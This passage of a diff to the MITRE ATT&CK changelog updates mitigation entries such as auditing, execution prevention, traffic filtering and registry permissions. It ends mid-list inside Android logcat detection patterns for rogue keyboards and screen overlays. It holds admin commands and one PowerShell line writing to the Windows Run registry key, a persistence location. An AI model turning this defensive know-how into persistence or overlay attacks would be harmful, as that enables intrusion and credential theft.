+                    "description": "Auditing is the process of recording activity and systematically reviewing and analyzing the activity and system configurations. The primary purpose of auditing is to detect anomalies and identify potential threats or weaknesses in the environment. Proper auditing configurations can also help to meet compliance requirements. The process of auditing encompasses regular analysis of user behaviors and system logs in support of proactive security measures.\n\nAuditing is applicable to all systems used within an organization, from the front door of a building to accessing a file on a fileserver. It is considered more critical for regulated industries such as, healthcare, finance and government where compliance requirements demand stringent tracking of user and system activates.This mitigation can be implemented through the following measures: \n\nSystem Audit:\n\n- Use Case: Regularly assess system configurations to ensure compliance with organizational security policies.\n- Implementation: Use tools to scan for deviations from established benchmarks.\n\nPermission Audits:\n\n- Use Case: Review file and folder permissions to minimize the risk of unauthorized access or privilege escalation.\n- Implementation: Run access reviews to identify users or groups with excessive permissions.\n\nSoftware Audits:\n\n- Use Case: Identify outdated, unsupported, or insecure software that could serve as an attack vector.\n- Implementation: Use inventory and vulnerability scanning tools to detect outdated versions and recommend secure alternatives.\n\nConfiguration Audits:\n\n- Use Case: Evaluate system and network configurations to ensure secure settings (e.g., disabled SMBv1, enabled MFA).\n- Implementation: Implement automated configuration scanning tools like SCAP (Security Content Automation Protocol) to identify non-compliant systems.\n\nNetwork Audits:\n\n- Use Case: Examine network traffic, firewall rules, and endpoint communications to identify unauthorized or insecure connections.\n- Implementation: Utilize tools such as Wireshark, or Zeek to monitor and log suspicious network behavior.",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/mitigations/M1047",
+                            "external_id": "M1047"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.3",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.731000+00:00\", \"old_value\": \"2024-12-10 16:28:27.046000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.3"
+                },
+                {
+                    "type": "course-of-action",
+                    "id": "course-of-action--eb88d97c-32f1-40be-80f0-d61a4b0b4b31",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-06-11 16:45:19.740000+00:00",
+                    "modified": "2026-05-12 15:12:00.731000+00:00",
+                    "name": "Disable or Remove Feature or Program",
+                    "description": "Disable or remove unnecessary and potentially vulnerable software, features, or services to reduce the attack surface and prevent abuse by adversaries. This involves identifying software or features that are no longer needed or that could be exploited and ensuring they are either removed or properly disabled. This mitigation can be implemented through the following measures: \n\nRemove Legacy Software:\n\n- Use Case: Disable or remove older versions of software that no longer receive updates or security patches (e.g., legacy Java, Adobe Flash).\n- Implementation: A company removes Flash Player from all employee systems after it has reached its end-of-life date.\n\nDisable Unused Features:\n\n- Use Case: Turn off unnecessary operating system features like SMBv1, Telnet, or RDP if they are not required.\n- Implementation: Disable SMBv1 in a Windows environment to mitigate vulnerabilities like EternalBlue.\n\nControl Applications Installed by Users:\n\n- Use Case: Prevent users from installing unauthorized software via group policies or other management tools.\n- Implementation: Block user installations of unauthorized file-sharing applications (e.g., BitTorrent clients) in an enterprise environment.\n\nRemove Unnecessary Services:\n\n- Use Case: Identify and disable unnecessary default services running on endpoints, servers, or network devices.\n- Implementation: Disable unused administrative shares (e.g., C$, ADMIN$) on workstations.\n\nRestrict Add-ons and Plugins:\n\n- Use Case: Remove or disable browser plugins and add-ons that are not needed for business purposes.\n- Implementation: Disable Java and ActiveX plugins in web browsers to prevent drive-by attacks.\n\n",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/mitigations/M1042",
+                            "external_id": "M1042"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.731000+00:00\", \"old_value\": \"2024-12-10 19:21:06.027000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.2"
+                },
+                {
+                    "type": "course-of-action",
+                    "id": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-06-11 16:35:25.488000+00:00",
+                    "modified": "2026-05-12 15:12:00.730000+00:00",
+                    "name": "Execution Prevention",
+                    "description": "Prevent the execution of unauthorized or malicious code on systems by implementing application control, script blocking, and other execution prevention mechanisms. This ensures that only trusted and authorized code is executed, reducing the risk of malware and unauthorized actions. This mitigation can be implemented through the following measures:\n\nApplication Control:\n\n- Use Case: Use tools like AppLocker or Windows Defender Application Control (WDAC) to create whitelists of authorized applications and block unauthorized ones. On Linux, use tools like SELinux or AppArmor to define mandatory access control policies for application execution.\n- Implementation: Allow only digitally signed or pre-approved applications to execute on servers and endpoints. (e.g., `New-AppLockerPolicy -PolicyType Enforced -FilePath \"C:\\Policies\\AppLocker.xml\"`) \n\n\nScript Blocking:\n\n- Use Case: Use script control mechanisms to block unauthorized execution of scripts, such as PowerShell or JavaScript. Web Browsers: Use browser extensions or settings to block JavaScript execution from untrusted sources.\n- Implementation: Configure PowerShell to enforce Constrained Language Mode for non-administrator users. (e.g., `Set-ExecutionPolicy AllSigned`) \n\nExecutable Blocking:\n\n- Use Case: Prevent execution of binaries from suspicious locations, such as `%TEMP%` or `%APPDATA%` directories.\n- Implementation: Block execution of `.exe`, `.bat`, or `.ps1` files from user-writable directories.\n\nDynamic Analysis Prevention:\n- Use Case: Use behavior-based execution prevention tools to identify and block malicious activity in real time.\n- Implemenation: Employ EDR solutions that analyze runtime behavior and block suspicious code execution.",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/mitigations/M1038",
+                            "external_id": "M1038"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.3",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.730000+00:00\", \"old_value\": \"2024-12-11 18:10:27.976000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.3"
+                },
+                {
+                    "type": "course-of-action",
+                    "id": "course-of-action--20f6a9df-37c4-4e20-9e47-025983b1b39d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-06-11 16:33:55.337000+00:00",
+                    "modified": "2026-05-12 15:12:00.730000+00:00",
+                    "name": "Filter Network Traffic",
+                    "description": "Employ network appliances and endpoint software to filter ingress, egress, and lateral network traffic. This includes protocol-based filtering, enforcing firewall rules, and blocking or restricting traffic based on predefined conditions to limit adversary movement and data exfiltration. This mitigation can be implemented through the following measures:\n\nIngress Traffic Filtering:\n\n- Use Case: Configure network firewalls to allow traffic only from authorized IP addresses to public-facing servers.\n- Implementation: Limit SSH (port 22) and RDP (port 3389) traffic to specific IP ranges.\n\nEgress Traffic Filtering:\n\n- Use Case: Use firewalls or endpoint security software to block unauthorized outbound traffic to prevent data exfiltration and command-and-control (C2) communications.\n- Implementation: Block outbound traffic to known malicious IPs or regions where communication is unexpected.\n\nProtocol-Based Filtering:\n\n- Use Case: Restrict the use of specific protocols that are commonly abused by adversaries, such as SMB, RPC, or Telnet, based on business needs.\n- Implementation: Disable SMBv1 on endpoints to prevent exploits like EternalBlue.\n\nNetwork Segmentation:\n\n- Use Case: Create network segments for critical systems and restrict communication between segments unless explicitly authorized.\n- Implementation: Implement VLANs to isolate IoT devices or guest networks from core business systems.\n\nApplication Layer Filtering:\n\n- Use Case: Use proxy servers or Web Application Firewalls (WAFs) to inspect and block malicious HTTP/S traffic.\n- Implementation: Configure a WAF to block SQL injection attempts or other web application exploitation techniques.",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/mitigations/M1037",
+                            "external_id": "M1037"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.730000+00:00\", \"old_value\": \"2024-12-11 19:43:03.354000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.2"
+                },
+                {
+                    "type": "course-of-action",
+                    "id": "course-of-action--86598de0-b347-4928-9eb0-0acbfc21908c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-06-10 20:41:03.271000+00:00",
+                    "modified": "2026-05-12 15:12:00.731000+00:00",
+                    "name": "Network Segmentation",
+                    "description": "Network segmentation involves dividing a network into smaller, isolated segments to control and limit the flow of traffic between devices, systems, and applications. By segmenting networks, organizations can reduce the attack surface, restrict lateral movement by adversaries, and protect critical assets from compromise.\n\nEffective network segmentation leverages a combination of physical boundaries, logical separation through VLANs, and access control policies enforced by network appliances like firewalls, routers, and cloud-based configurations. This mitigation can be implemented through the following measures:\n\nSegment Critical Systems:\n\n- Identify and group systems based on their function, sensitivity, and risk. Examples include payment systems, HR databases, production systems, and internet-facing servers.\n- Use VLANs, firewalls, or routers to enforce logical separation.\n\nImplement DMZ for Public-Facing Services:\n\n- Host web servers, DNS servers, and email servers in a DMZ to limit their access to internal systems.\n- Apply strict firewall rules to filter traffic between the DMZ and internal networks.\n\nUse Cloud-Based Segmentation:\n\n- In cloud environments, use VPCs, subnets, and security groups to isolate applications and enforce traffic rules.\n- Apply AWS Transit Gateway or Azure VNet peering for controlled connectivity between cloud segments.\n\nApply Microsegmentation for Workloads:\n\n- Use software-defined networking (SDN) tools to implement workload-level segmentation and prevent lateral movement.\n\nRestrict Traffic with ACLs and Firewalls:\n\n- Apply Access Control Lists (ACLs) to network devices to enforce \"deny by default\" policies.\n- Use firewalls to restrict both north-south (external-internal) and east-west (internal-internal) traffic.\n\nMonitor and Audit Segmented Networks:\n\n- Regularly review firewall rules, ACLs, and segmentation policies.\n- Monitor network flows for anomalies to ensure segmentation is effective.\n\nTest Segmentation Effectiveness:\n\n- Perform periodic penetration tests to verify that unauthorized access is blocked between network segments.",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/mitigations/M1030",
+                            "external_id": "M1030"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.731000+00:00\", \"old_value\": \"2026-04-24 19:41:50.467000+00:00\"}}}",
+                    "previous_version": "1.2"
+                },
+                {
+                    "type": "course-of-action",
+                    "id": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-10-19 14:57:58.771000+00:00",
+                    "modified": "2026-05-12 15:12:00.731000+00:00",
+                    "name": "Pre-compromise",
+                    "description": "Pre-compromise mitigations involve proactive measures and defenses implemented to prevent adversaries from successfully identifying and exploiting weaknesses during the Reconnaissance and Resource Development phases of an attack. These activities focus on reducing an organization's attack surface, identify adversarial preparation efforts, and increase the difficulty for attackers to conduct successful operations. This mitigation can be implemented through the following measures:\n\nLimit Information Exposure:\n\n- Regularly audit and sanitize publicly available data, including job posts, websites, and social media.\n- Use tools like OSINT monitoring platforms (e.g., SpiderFoot, Recon-ng) to identify leaked information.\n\nProtect Domain and DNS Infrastructure:\n\n- Enable DNSSEC and use WHOIS privacy protection.\n- Monitor for domain hijacking or lookalike domains using services like RiskIQ or DomainTools.\n\nExternal Monitoring:\n\n- Use tools like Shodan, Censys to monitor your external attack surface.\n- Deploy external vulnerability scanners to proactively address weaknesses.\n\nThreat Intelligence:\n\n- Leverage platforms like MISP, Recorded Future, or Anomali to track adversarial infrastructure, tools, and activity.\n\nContent and Email Protections:\n\n- Use email security solutions like Proofpoint, Microsoft Defender for Office 365, or Mimecast.\n- Enforce SPF/DKIM/DMARC policies to protect against email spoofing.\n\nTraining and Awareness:\n\n- Educate employees on identifying phishing attempts, securing their social media, and avoiding information leaks.",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/mitigations/M1056",
+                            "external_id": "M1056"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.731000+00:00\", \"old_value\": \"2024-12-18 18:24:37.835000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "course-of-action",
+                    "id": "course-of-action--987988f0-cf86-4680-a875-2f6456ab2448",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-06-06 20:54:49.964000+00:00",
+                    "modified": "2026-05-12 15:12:00.731000+00:00",
+                    "name": "Restrict File and Directory Permissions",
+                    "description": "Restricting file and directory permissions involves setting access controls at the file system level to limit which users, groups, or processes can read, write, or execute files. By configuring permissions appropriately, organizations can reduce the attack surface for adversaries seeking to access sensitive data, plant malicious code, or tamper with system files.\n\nEnforce Least Privilege Permissions:\n\n- Remove unnecessary write permissions on sensitive files and directories.\n- Use file ownership and groups to control access for specific roles.\n\nExample (Windows): Right-click the shared folder \u2192 Properties \u2192 Security tab \u2192 Adjust permissions for NTFS ACLs.\n\nHarden File Shares:\n\n- Disable anonymous access to shared folders.\n- Enforce NTFS permissions for shared folders on Windows.\n\nExample: Set permissions to restrict write access to critical files, such as system executables (e.g., `/bin` or `/sbin` on Linux). Use tools like `chown` and `chmod` to assign file ownership and limit access.\n\nOn Linux, apply:\n`chmod 750 /etc/sensitive.conf`\n`chown root:admin /etc/sensitive.conf`\n\nFile Integrity Monitoring (FIM):\n\n- Use tools like Tripwire, Wazuh, or OSSEC to monitor changes to critical file permissions.\n\nAudit File System Access:\n\n- Enable auditing to track permission changes or unauthorized access attempts.\n- Use auditd (Linux) or Event Viewer (Windows) to log activities.\n\nRestrict Startup Directories:\n\n- Configure permissions to prevent unauthorized writes to directories like `C:\\ProgramData\\Microsoft\\Windows\\Start Menu`.\n\nExample: Restrict write access to critical directories like `/etc/`, `/usr/local/`, and Windows directories such as `C:\\Windows\\System32`.\n\n- On Windows, use icacls to modify permissions: `icacls \"C:\\Windows\\System32\" /inheritance:r /grant:r SYSTEM:(OI)(CI)F`\n- On Linux, monitor permissions using tools like `lsattr` or `auditd`.",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/mitigations/M1022",
+                            "external_id": "M1022"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.731000+00:00\", \"old_value\": \"2024-12-18 19:18:58.856000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.2"
+                },
+                {
+                    "type": "course-of-action",
+                    "id": "course-of-action--a2c36a5d-4058-475e-8e77-fff75e50d3b9",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-06-06 20:58:59.577000+00:00",
+                    "modified": "2026-05-12 15:12:00.731000+00:00",
+                    "name": "Restrict Registry Permissions",
+                    "description": "Restricting registry permissions involves configuring access control settings for sensitive registry keys and hives to ensure that only authorized users or processes can make modifications. By limiting access, organizations can prevent unauthorized changes that adversaries might use for persistence, privilege escalation, or defense evasion. This mitigation can be implemented through the following measures:\n\nReview and Adjust Permissions on Critical Keys\n\n- Regularly review permissions on keys such as `Run`, `RunOnce`, and `Services` to ensure only authorized users have write access.\n- Use tools like `icacls` or `PowerShell` to automate permission adjustments.\n\nEnable Registry Auditing\n\n- Enable auditing on sensitive keys to log access attempts.\n- Use Event Viewer or SIEM solutions to analyze logs and detect suspicious activity.\n- Example Audit Policy: `auditpol /set /subcategory:\"Registry\" /success:enable /failure:enable`\n\nProtect Credential-Related Hives\n\n- Limit access to hives like `SAM`,`SECURITY`, and `SYSTEM` to prevent credential dumping or other unauthorized access.\n- Use LSA Protection to add an additional security layer for credential storage.\n\nRestrict Registry Editor Usage\n\n- Use Group Policy to restrict access to regedit.exe for non-administrative users.\n- Block execution of registry editing tools on endpoints where they are unnecessary.\n\nDeploy Baseline Configuration Tools\n\n- Use tools like Microsoft Security Compliance Toolkit or CIS Benchmarks to apply and maintain secure registry configurations.\n\n*Tools for Implementation* \n\nRegistry Permission Tools:\n\n- Registry Editor (regedit): Built-in tool to manage registry permissions.\n- PowerShell: Automate permissions and manage keys. `Set-ItemProperty -Path \"HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"KeyName\" -Value \"Value\"`\n- icacls: Command-line tool to modify ACLs.\n\nMonitoring Tools:\n\n- Sysmon: Monitor and log registry events.\n- Event Viewer: View registry access logs.\n\nPolicy Management Tools:\n\n- Group Policy Management Console (GPMC): Enforce registry permissions via GPOs.\n- Microsoft Endpoint Manager: Deploy configuration baselines for registry permissions.",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/mitigations/M1024",
+                            "external_id": "M1024"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.731000+00:00\", \"old_value\": \"2024-12-24 13:34:49.309000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.2"
+                },
+                {
+                    "type": "course-of-action",
+                    "id": "course-of-action--93e7968a-9074-4eac-8ae9-9f5200ec3317",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-06-06 16:50:58.767000+00:00",
+                    "modified": "2026-05-12 15:12:00.731000+00:00",
+                    "name": "User Account Management",
+                    "description": "User Account Management involves implementing and enforcing policies for the lifecycle of user accounts, including creation, modification, and deactivation. Proper account management reduces the attack surface by limiting unauthorized access, managing account privileges, and ensuring accounts are used according to organizational policies. This mitigation can be implemented through the following measures:\n\nEnforcing the Principle of Least Privilege\n\n- Implementation: Assign users only the minimum permissions required to perform their job functions. Regularly audit accounts to ensure no excess permissions are granted.\n- Use Case: Reduces the risk of privilege escalation by ensuring accounts cannot perform unauthorized actions.\n\nImplementing Strong Password Policies\n\n- Implementation: Enforce password complexity requirements (e.g., length, character types). Require password expiration every 90 days and disallow password reuse.\n- Use Case: Prevents adversaries from gaining unauthorized access through password guessing or brute force attacks.\n\nManaging Dormant and Orphaned Accounts\n\n- Implementation: Implement automated workflows to disable accounts after a set period of inactivity (e.g., 30 days). Remove orphaned accounts (e.g., accounts without an assigned owner) during regular account audits.\n- Use Case: Eliminates dormant accounts that could be exploited by attackers.\n\nAccount Lockout Policies\n\n- Implementation: Configure account lockout thresholds (e.g., lock accounts after five failed login attempts). Set lockout durations to a minimum of 15 minutes.\n- Use Case: Mitigates automated attack techniques that rely on repeated login attempts.\n\nMulti-Factor Authentication (MFA) for High-Risk Accounts\n\n- Implementation: Require MFA for all administrative accounts and high-risk users. Use MFA mechanisms like hardware tokens, authenticator apps, or biometrics.\n- Use Case: Prevents unauthorized access, even if credentials are stolen.\n\nRestricting Interactive Logins\n\n- Implementation: Restrict interactive logins for privileged accounts to specific secure systems or management consoles. Use group policies to enforce logon restrictions.\n- Use Case: Protects sensitive accounts from misuse or exploitation.\n\n*Tools for Implementation*\n\nBuilt-in Tools:\n\n- Microsoft Active Directory (AD): Centralized account management and RBAC enforcement.\n- Group Policy Object (GPO): Enforce password policies, logon restrictions, and account lockout policies.\n\nIdentity and Access Management (IAM) Tools:\n\n- Okta: Centralized user provisioning, MFA, and SSO integration.\n- Microsoft Azure Active Directory: Provides advanced account lifecycle management, role-based access, and conditional access policies.\n\nPrivileged Account Management (PAM):\n- CyberArk, BeyondTrust, Thycotic: Manage and monitor privileged account usage, enforce session recording, and JIT access.",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/mitigations/M1018",
+                            "external_id": "M1018"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.731000+00:00\", \"old_value\": \"2024-12-24 14:33:36.029000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.2"
+                },
+                {
+                    "type": "course-of-action",
+                    "id": "course-of-action--2a4f6c11-a4a7-4cb9-b0ef-6ae1bb3a718a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-06-06 16:50:04.963000+00:00",
+                    "modified": "2026-05-12 15:12:00.730000+00:00",
+                    "name": "User Training",
+                    "description": "User Training involves educating employees and contractors on recognizing, reporting, and preventing cyber threats that rely on human interaction, such as phishing, social engineering, and other manipulative techniques. Comprehensive training programs create a human firewall by empowering users to be an active component of the organization's cybersecurity defenses. This mitigation can be implemented through the following measures:\n\nCreate Comprehensive Training Programs:\n\n- Design training modules tailored to the organization's risk profile, covering topics such as phishing, password management, and incident reporting.\n- Provide role-specific training for high-risk employees, such as helpdesk staff or executives.\n\nUse Simulated Exercises:\n\n- Conduct phishing simulations to measure user susceptibility and provide targeted follow-up training.\n- Run social engineering drills to evaluate employee responses and reinforce protocols.\n\nLeverage Gamification and Engagement:\n\n- Introduce interactive learning methods such as quizzes, gamified challenges, and rewards for successful detection and reporting of threats.\n\nIncorporate Security Policies into Onboarding:\n\n- Include cybersecurity training as part of the onboarding process for new employees.\n- Provide easy-to-understand materials outlining acceptable use policies and reporting procedures.\n\nRegular Refresher Courses:\n\n- Update training materials to include emerging threats and techniques used by adversaries.\n- Ensure all employees complete periodic refresher courses to stay informed.\n\nEmphasize Real-World Scenarios:\n\n- Use case studies of recent attacks to demonstrate the consequences of successful phishing or social engineering.\n- Discuss how specific employee actions can prevent or mitigate such attacks.",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/mitigations/M1017",
+                            "external_id": "M1017"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.3",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.730000+00:00\", \"old_value\": \"2024-12-24 14:36:46.335000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.3"
+                }
+            ],
+            "revocations": [],
+            "deprecations": [],
+            "deletions": []
+        },
+        "datasources": {
+            "additions": [],
+            "major_version_changes": [],
+            "minor_version_changes": [],
+            "other_version_changes": [],
+            "patches": [],
+            "revocations": [],
+            "deprecations": [],
+            "deletions": []
+        },
+        "datacomponents": {
+            "additions": [],
+            "major_version_changes": [],
+            "minor_version_changes": [],
+            "other_version_changes": [],
+            "patches": [
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.272000+00:00",
+                    "modified": "2026-05-12 15:12:00.776000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0038",
+                            "external_id": "DC0038"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Application Log Content",
+                    "description": "Application Log Content refers to logs generated by applications or services, providing a record of their activity. These logs may include metrics, errors, performance data, and operational alerts from web, mail, or other applications. These logs are vital for monitoring application behavior and detecting malicious activities or anomalies. Examples: \n\n- Web Application Logs: These logs include information about requests, responses, errors, and security events (e.g., unauthorized access attempts).\n- Email Application Logs: Logs contain metadata about emails sent, received, or blocked (e.g., sender/receiver addresses, message IDs).\n- SaaS Application Logs: Activity logs include user logins, configuration changes, and access to sensitive resources.\n- Cloud Application Logs: Logs detail control plane activities, including API calls, instance modifications, and network changes.\n- System/Application Monitoring Logs: Logs provide insights into application performance, errors, and anomalies.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "android:logcat",
+                            "channel": "Default IME active or bound to <pkg> (InputMethodManager reports imeId=<pkg>)"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Default IME changed/active: imeId=<pkg>, onStartInput/onFinishInput high frequency. TYPE_APPLICATION_OVERLAY|addView .* showing on top of package <otherPkg>"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Default IME active imeId=<pkg>; frequent onStartInput/commitText calls"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "addView TYPE_APPLICATION_OVERLAY|TYPE_APPLICATION_ATTACHED_DIALOG shown over <target_pkg>"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Secure/Global reads of device_policy_manager, accessibility_enabled, default_vpn, always_on_vpn"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Task switch from browser/custom tab to handler immediately after OAuth return"
+                        },
+                        {
+                            "name": "android:logcat",
